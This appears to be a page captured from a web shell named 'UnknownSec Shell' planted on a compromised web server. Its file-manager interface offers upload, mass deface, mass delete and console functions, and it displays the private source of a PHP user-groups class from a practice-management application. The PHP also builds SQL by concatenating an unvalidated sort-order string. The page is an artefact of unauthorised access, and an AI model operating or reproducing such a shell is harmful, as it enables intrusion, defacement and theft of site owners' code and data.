shell bypass 403
UnknownSec Shell
:
/
home
/
delvin
/
dev.delv-in.com
/
models
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
m_usr_groups.php
<?php /* User Production PMS Class */ class User_Groups { private $Database; private $db_table = 'users_groups'; function __construct(){ global $Database; $this->Database = $Database; } public function get_all($sortOrder){ $data = array(); if ($sortOrder == ''){ $sortOrder = "`effectiveTS`"; } $query = "SELECT * FROM `" . $this->db_table ."` WHERE `practiceID` = '" . $_SESSION['PID'] . "' ORDER BY " . $sortOrder; // echo __LINE__." m_usr_groups: " . $query . "<br>"; if ($stmt = $this->Database->prepare("SELECT * FROM `" . $this->db_table ."` WHERE `practiceID` = ? ORDER BY " . $sortOrder)){ $stmt->bind_param('i', $_SESSION['PID']); $stmt->execute(); $stmt->store_result(); $stmt->bind_result($usrGroupID, $practiceID, $userID, $groupData, $effectiveTS, $expireTS); while($stmt->fetch()){ $data[$userID] = array('usrGroupID'=>$usrGroupID, 'practiceID'=>$practiceID, 'userID'=>$userID, 'groupData'=>$groupData, 'effectiveTS'=>$effectiveTS, 'expireTS'=>$expireTS); } return $data; $stmt->close(); } } public function search($userID, $t1, $t2, $usrGroupID, $sortOrder){ $rows = $this->get_all($sortOrder); // echo __LINE__." m_usr_groups: <pre>"; print_r($rows); echo "</pre>"; foreach ($rows as $key => $row){ if ($userID > 0 && $row['userID'] != $userID){ unset($rows[$key]); } if ($usrGroupID > 0 && $row['usrGroupID'] != $usrGroupID){ unset($rows[$key]); } // unset records that expired before t1 if (($t1 > 0 && $t2 <= 0) && ($row['expireTS'] > 0 && $row['expireTS'] < $t1) ){ unset($rows[$key]); } else if (($t1 > 0 && $t2 > 0) && $row['effectiveTS'] >= $t2 || ($row['expireTS'] > 0 && $row['expireTS'] < $t1)){ //unset records not active at any time from t1 to t2 unset($rows[$key]); } } if ($usrGroupID > 0){ $rows = $rows[array_key_first($rows)]; } else { $rows = array_values($rows); } return $rows; } public function add_mod($usrGroupID, $userID, $groupData, $effectiveTS, $xEffectiveTS){ $Template = new Template; if ($usrGroupID <= 0){ // insert $expireTS = 0; // set expire for previous policy - get previous policy // get most recent policy $previous_policy = $this->search($_SESSION['edit_id'], '', '', '', 'effectiveTS DESC'); $previous_policy = $previous_policy[0]; if (isset($previous_policy['usrGroupID'])){ // set expire to the effective date of new policy $this->update_expire($previous_policy['usrGroupID'], $effectiveTS - 1); } $query = "INSERT INTO " . $this->db_table . " (practiceID, userID, groupData, effectiveTS, expireTS) VALUES (".$_SESSION['PID'].", ".$userID . ", " . $groupData . ", " . $effectiveTS . ", " . $expireTS . ")"; // echo __line__.": ".$query."<br>"; if ($stmt = $this->Database->prepare("INSERT INTO " . $this->db_table . " (practiceID, userID, groupData, effectiveTS, expireTS) VALUES (?,?,?,?,?)")){ $stmt->bind_param('iisii', $_SESSION['PID'], $userID, $groupData, $effectiveTS, $expireTS); if ($stmt->execute()){ $Template->set_alert("Group data added", 'success'); } else { $Template->set_alert("ERROR: Record NOT added", 'error'); } } else { $Template->set_alert("ERROR: Could not prepare mysqli statement. m_usr_groups ".__line__, 'error'); } } else { // update if ($xEffectiveTS != $effectiveTS ){ // effective date was changed -> need to update expire date of previous policy // look for policy with expireTS that matches xEffectiveTS $previous_policy = $this->search($_SESSION['edit_id'], '', '', '', 'effectiveTS DESC'); $previous_policy = $previous_policy[1]; if (isset($previous_policy['usrGroupID'])){ // set expire to the effective date of new policy $this->update_expire($previous_policy['usrGroupID'], $effectiveTS - 1); } } $query = "UPDATE " . $this->db_table . " SET groupData='".$groupData."', effectiveTS ='".$effectiveTS . "' WHERE usrGroupID='".$_POST['usrGroupID']."' and practiceID='".$_SESSION['PID']."'"; // echo __line__.": ".$query."<br>"; if ($stmt = $this->Database->prepare("UPDATE " . $this->db_table . " SET groupData = ?, effectiveTS = ? WHERE usrGroupID = ? and practiceID = ?")){ $stmt->bind_param('siii',$groupData, $effectiveTS, $usrGroupID, $_SESSION['PID']); if ($stmt->execute()){ $Template->set_alert("Changes saved", 'success'); } else { $Template->set_alert("ERROR: Changes NOT saved", 'error'); } } else { $Template->set_alert("ERROR: Could not prepare mysqli statement. m_usr_groups ".__line__, 'error'); } } } public function update_expire($usrGroupID, $expireTS){ $Template = new Template; if ($usrGroupID > 0){ $query = "UPDATE ". $this->db_table." SET expireTS = '".$expireTS."' WHERE usrGroupID = '".$usrGroupID."'"; if ($stmt = $this->Database->prepare("UPDATE ". $this->db_table." SET expireTS = ? WHERE usrGroupID = ?")){ $stmt->bind_param('ii', $expireTS, $usrGroupID); $stmt->execute(); $stmt->close(); } else { $Template->set_alert("ERROR: could not prepare SQLi statement.".__LINE__."-m_usr_groups", 'error'); } } else { $query = "UPDATE ". $this->db_table." SET expireTS = '".$expireTS."' WHERE userID = '". $_SESSION['edit_id'] . "' and expireTS = '" . $zero ."'"; $zero = 0; if ($stmt = $this->Database->prepare("UPDATE ". $this->db_table." SET expireTS = ? WHERE userID = ? and expireTS = ?")){ $stmt->bind_param('iii', $expireTS, $_SESSION['edit_id'], $zero); $stmt->execute(); $stmt->close(); } else { $Template->set_alert("ERROR: could not prepare SQLi statement.".__LINE__."-m_usr_groups", 'error'); } } // echo __LINE__.": update_expire = " . $query ."<br>"; } public function delete($usrGroupID, $userID){ if ($usrGroupID > 0){ // == remove expiry date of previous policy ======== $previous_policy = $this->search($_SESSION['edit_id'], '', '', '', 'effectiveTS DESC'); $previous_policy = $previous_policy[1]; if (isset($previous_policy['usrGroupID'])){ $this->update_expire($previous_policy['usrGroupID'], '0'); } if ($stmt = $this->Database->prepare("DELETE FROM " . $this->db_table . " WHERE usrGroupID = ?")){ $stmt->bind_param('i', $usrGroupID); if ($stmt->execute()){ return true; } else { return false; } } } else if ($userID > 0){ if ($stmt = $this->Database->prepare("DELETE FROM " . $this->db_table . " WHERE userID=? AND practiceID = ?")){ $stmt->bind_param('ii', $userID, $_SESSION['PID']); if ($stmt->execute()){ return true; } else { return false; } } } } } ?>
© 2026 UnknownSec